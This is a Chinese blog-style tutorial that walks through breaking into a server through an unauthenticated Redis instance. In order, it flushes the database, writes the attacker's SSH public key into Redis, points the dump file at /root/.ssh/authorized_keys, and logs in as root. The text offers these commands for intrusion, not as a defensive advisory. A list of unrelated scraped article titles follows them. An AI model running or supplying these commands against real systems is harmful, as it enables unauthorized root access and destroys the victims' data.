通过redis入侵服务器的原理是:利用了redis默认配置,许多用户没有设置访问的key。然后通过向redis把自己的公钥写入到redis,然后利更改redis的数据库文件配置,把数据写入到认证文件。形成免密码登陆。

一,生成本地ssh公钥

ssh-keygen

二,先连接redis看看

telnet 192.168.15.10 6379

redis-cli -h 192.168.15.10

三, 清一下redis数据库

redis-cli -h 192.168.15.10 flushall

四, 向redis写自己的公钥

cat key.txt |redis-cli -h 192.168.15.10 -x set redis

五, 利用redis写入到文件中

#连接redis

#redis-cli -h 192.168.15.10

#查看keys

192.168.15.10>keys *

#写入配置库的路径及存放位置

192.168.15.10>CONFIG SET dir /root/.ssh/

#写入配置库名称及存放的名字

192.168.15.10>CONFIG SET dbfilename "authorized_keys"

#写入

192.168.15.10>save

#退出

192.168.15.10>exit

六, 远程连接

ssh root@192.168.15.10

注意,这个是使用的默认的。也就是说别人是用的root来启动的redis 并且没有更改sshd配置文件的位置,以及redis可以默认的可以随意访问性的。当然有许多可以猜。

这个是最近redis爆出来的。

(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt

python如何入侵服务器的_通过redis入侵服务器的步骤相关推荐

  1. redis多服务器共享_基于redis和shedlock实现分布式锁(超简单)

    一.背景 线上部署了两台服务器,通过nginx轮询的方式进行负载均衡.但是这样存在一个问题同一个用户的session共享问题.你或许会说,使用ipHash模式就可以解决session共享的问题,是的确 ...

  2. 云服务ftp服务器搭建_在阿里云服务器搭建FTP服务器,在本地电脑连接并操作

    首先你需要有一个阿里云的ECS服务器 并且开通了公网宽带(话说也不贵,开来玩玩还是可以的,第一次买会比较便宜,第二次买1M的宽带两天是九毛多吧~) 开通了宽带之后,ECS服务器就可以上网了 如果嫌弃阿 ...

  3. teamspeak3服务器搭建_搭建TeamSpeak语音服务器

    1.下载 用文件传输工具传输到服务器上(/root目录下) 2.安装 更新系统 yum update 开放端口 systemctl start firewalld firewall-cmd --zon ...

  4. python刷票脚本在哪_可以挂在服务器的 12306 刷票脚本

    只是在刷出票后发送提醒消息,并不能自动购票.在收到消息后还是得拼手速. 脚本用 Python3 实现,可挂到服务器上 24 小时刷. 前言 总体来说火车票应当是越来越好买,因此一直没怎么太操心.哪知道 ...

  5. 被黑客入侵了怎么办_被黑客入侵后该怎么办

    被黑客入侵了怎么办 Evernote became the latest member of the "we've been hacked" club. And the thing ...

  6. 如何使用python脚本下载git代码_通过pycharm使用git的步骤(图文详解)

    前言 使用git+pycharm有一段时间了,算是稍有点心得,这边整理一下,可能有的方法不是最优,欢迎交流,可能还是习惯敲命令去使用git,不过其实pycharm已经帮忙做了很多了,我们可以不用记住那 ...

  7. SAAS多租户实现方案_springboot 实现多租户_基于数据库服务器隔离_或共享数据库服务器_但隔离数据库---springcloud工作笔记159

    技术交流QQ群[JAVA,C++,Python,.NET,BigData,AI]:170933152 1.先来看看什么是saas?     SaaS是Software-as-a-service(软件即 ...

  8. mysql数据库服务器重启_重启mysql数据库服务器

    Mysql错误代码大全 1016错误:文件无法打开,使用后台修复或者使用phpmyadmin进行修复. 1044错误:数据库用户权限不足,请联系空间商解决 1045错误:数据库服务器/数据库用户名/数 ...

  9. windows云服务器价格_免费windows云服务器

    {"moduleinfo":{"card_count":[{"count_phone":1,"count":1}],&q ...

最新文章

  1. Tungsten Fabric SDN — 操作实践 — Virtual Networks L2/L3 互联
  2. ai3中文语音补丁_NS 暗黑破坏神3 中文补丁今日上线!刷起来
  3. 一文让你完全弄懂Stegosaurus
  4. PrimeTime指南——概述和基本流程
  5. jmeter性能分析_使用JMeter和Yourkit进行REST / HTTP服务的性能分析
  6. build 之前执行task_浅谈VS编译自定义编译任务—MSBuild Task(csproject)-阿里云开发者社区...
  7. VBA 打开文件对话框
  8. ClassNotFoundException: INameEnvironment
  9. 使用.NET Core 2开发部署Angular 5项目
  10. UVALive - 6440(模拟)
  11. alexa/alexa-avs-sample-app Windows 安装教程
  12. dcdc转换器计算机显示,DC-DC转换器的问题
  13. 什么是VIE:Variable Interest Entities
  14. PEGA(Low-Code App Builder)Describing a data object
  15. 《考取HCIA证书看我就够了》第五篇:[HCIA-IoT]物联网技术之感知层技术概览
  16. 安徽省美术作品版权登记技巧,申请了商标还要申请美术作品版权吗?
  17. 运用Java获取当前时间
  18. STM32F103-LED模块
  19. TortoiseSVN日常使用指南(一)
  20. ps样式如何导入?Photoshop样式导入教程

热门文章

  1. 检索数据_6_过滤记录结合使用别名
  2. PHP系统能不能加爬虫,php能做爬虫吗
  3. java returnAddres_JavaClient 查询ES-(重要)
  4. [计算机视觉]人脸应用:人脸检测、人脸对比、五官检测、眨眼检测、活体检测、疲劳检测
  5. C++const类型的引用参数
  6. python中复制、浅层拷贝、深层拷贝的区别
  7. matlab创建二叉树(二维数据)
  8. 131125 - 关于对“一次元”、“二次元”、“三次元”的兴趣变化的奇思妙想
  9. java实现mysql的主从切换(第二部分)
  10. Android 通过Service单独进程模仿离线推送 Server Push